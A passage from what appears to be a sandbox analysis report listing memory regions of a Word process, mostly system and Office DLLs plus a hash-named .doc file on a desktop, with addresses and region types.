"\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 406 start_va = 0x6a7f0000 end_va = 0x6a84bfff monitored = 0 entry_point = 0x6a7f8880 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 407 start_va = 0x6a850000 end_va = 0x6a87bfff monitored = 0 entry_point = 0x6a8724b0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 408 start_va = 0x6a880000 end_va = 0x6a997fff monitored = 0 entry_point = 0x6a8840b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msptls.dll") Region: id = 409 start_va = 0x6a9a0000 end_va = 0x6a9e3fff monitored = 0 entry_point = 0x6a9baaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 410 start_va = 0x6a9f0000 end_va = 0x6a9fefff monitored = 0 entry_point = 0x6a9f2a50 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 411 start_va = 0x6aa00000 end_va = 0x6ad88fff monitored = 0 entry_point = 0x6aa9cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 412 start_va = 0x6ad90000 end_va = 0x6bb41fff monitored = 0 entry_point = 0x6ad91000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 413 start_va = 0x6bb50000 end_va = 0x6bb6cfff monitored = 0 entry_point = 0x6bb57240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 414 start_va = 0x6bb70000 end_va = 0x6bb8ffff monitored = 0 entry_point = 0x6bb82810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 415 start_va = 0x6bb90000 end_va = 0x6bb95fff monitored = 0 entry_point = 0x6bb91490 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 416 start_va = 0x6bba0000 end_va = 0x6c137fff monitored = 0 entry_point = 0x6bba1000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 417 start_va = 0x6c140000 end_va = 0x6c854fff monitored = 0 entry_point = 0x6c141000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 418 start_va = 0x6c860000 end_va = 0x6cb61fff monitored = 0 entry_point = 0x6c861000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 419 start_va = 0x6cb70000 end_va = 0x6cd44fff monitored = 0 entry_point = 0x6cb71000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 420 start_va = 0x6cd50000 end_va = 0x6d941fff monitored = 0 entry_point = 0x6cd51000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\oart.dll") Region: id = 421 start_va = 0x6d950000 end_va = 0x6d9bffff monitored = 0 entry_point = 0x6d98ec20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\SysWOW64\\msvcp140.dll" (normalized: "c:\\windows\\syswow64\\msvcp140.dll") Region: id = 422 start_va = 0x6d9c0000 end_va = 0x6db2afff monitored = 0 entry_point = 0x6da2e360 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll") Region: id = 423 start_va = 0x6db30000 end_va = 0x6f791fff monitored = 0 entry_point = 0x6db31000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wwlib.dll") Region: id = 424 start_va = 0x6f7a0000 end_va = 0x6f880fff monitored = 0 entry_point = 0x6f7ce6b0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 425 start_va = 0x6f890000 end_va = 0x6f8a3fff monitored = 0 entry_point = 0x6f89e290 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\SysWOW64\\vcruntime140.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140.dll") Region: id = 426 start_va = 0x6f8b0000 end_va = 0x6f8dcfff monitored = 0 entry_point = 0x6f8c2b00 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 427 start_va = 0x6fa40000 end_va = 0x6fb8afff monitored = 0 entry_point = 0x6faa1660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 428 start_va = 0x6fb90000 end_va = 0x6fbc2fff monitored = 0 entry_point = 0x6fba0e70 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 429 start_va = 0x6fbd0000 end_va = 0x6fbd9fff monitored = 0 entry_point = 0x6fbd3200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 430 start_va = 0x6fcf0000 end_va = 0x6ff07fff monitored = 0 entry_point = 0x6fd997b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 431 start_va = 0x705f0000 end_va = 0x706bcfff monitored = 0 entry_point = 0x706429c0 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\SysWOW64\\twinapi.appcore.dll" (normalized: "c:\\windows\\syswow64\\twinapi.appcore.dll") Region: id = 432 start_va = 0x706c0000 end_va = 0x708d9fff monitored = 0 entry_point = 0x70755550 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 433 start_va = 0x709e0000 end_va = 0x70a86fff monitored = 0 entry_point = 0x70a16240 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\SysWOW64\\dcomp.dll" (normalized: "c:\\windows\\syswow64\\dcomp.dll") Region: id = 434 start_va = 0x70ae0000 end_va = 0x70b62fff monitored = 0 entry_point = 0x70b037c0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 435 start_va = 0x70b70000 end_va = 0x70d60fff monitored = 0 entry_point = 0x70c53cd0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 436 start_va = 0x70d70000 end_va = 0x711fdfff monitored = 0 entry_point = 0x710fa320 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 437 start_va = 0x71540000 end_va = 0x7155afff monitored = 0 entry_point = 0x71549050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 438 start_va = 0x72d30000 end_va = 0x72f3efff monitored = 0 entry_point = 0x72ddb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 439 start_va = 0x73db0000 end_va = 0x73dccfff monitored = 0 entry_point = 0x73db3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 440 start_va = 0x73dd0000 end_va = 0x73e44fff monitored = 0 entry_point = 0x73e09a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 441 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 442 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 443 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 444 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 445 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 446 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 447 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 448 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 449 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 450 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 451 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 452 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 453 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 454 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 455 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 456 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 457 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 458 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 459 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 460 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 461 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 462 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 463 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 464 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 465 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 466 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 467 start_va = 0x77170000 end_va = 0x771c9fff monitored = 0 entry_point = 0x77197e70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 468 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 469 start_va = 0x7fea0000 end_va = 0x7feaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fea0000" filename = "" Region: id = 470 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 471 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 472 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 473 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 474 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 475 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 476 start_va = 0x71780000 end_va = 0x718fdfff monitored = 0 entry_point = 0x717fc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 477 start_va = 0x73ae0000 end_va = 0x73daafff monitored = 0 entry_point = 0x73d1c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 478 start_va = 0xc30000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 479 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 480 start_va = 0xf8a0000 end_va = 0xfd02fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc62c80cb647ce09ff33f296b1f9e47doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc62c80cb647ce09ff33f296b1f9e47doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc62c80cb647ce09ff33f296b1f9e47doc") Region: id = 481 start_va = 0x69650000 end_va = 0x69659fff monitored = 0 entry_point = 0x69652a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 482 start_va = 0x69650000 end_va = 0x69659fff monitored = 0 entry_point = 0x69652a34 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 483 start_va = 0x69650000 end_va = 0x6965bfff monitored = 0 entry_point = 0x696528fd region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 484 start_va = 0x69630000 end_va = 0x6964ffff monitored = 0 entry_point = 0x6963c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 485 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 486 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 487 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 488 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 489 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 490 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 491 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 492 start_va = 0xf8a0000 end_va = 0xfd02fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc") Region: id = 493 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 494 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 495 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 496 start_va = 0xcf90000 end_va = 0xd1c1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc") Region: id = 497 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 498 start_va = 0xf8a0000 end_va = 0xfd02fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc") Region: id = 499 start_va = 0x69620000 end_va = 0x69651fff monitored = 0 entry_point = 0x6963c742 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 500 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 501 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 502 start_va = 0xf8a0000 end_va = 0xfd02fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc") Region: id = 503 start_va = 0x69620000 end_va = 0x6965efff monitored = 0 entry_point = 0x69644c50 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 504 start_va = 0x69600000 end_va = 0x6961ffff monitored = 0 entry_point = 0x6960c7d4 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 505 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 506 start_va = 0xcf90000 end_va = 0xd1c1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc") Region: id = 507 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 508 start_va = 0xf8a0000 end_va = 0xfd02fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\3b86f8aff12d2b32461a0b20f01f3d13ee062c80cb647ce09ff33f296b1f9e47.doc") Region: id = 509 start_va = 0xf4a0000 end_va = 0xf89ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4a0000" filename = "" Region: id = 510 start_va = 0xf4a0000 end_va = 0xfc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f4a0000" filename = "" Region: id = 511 start_va = 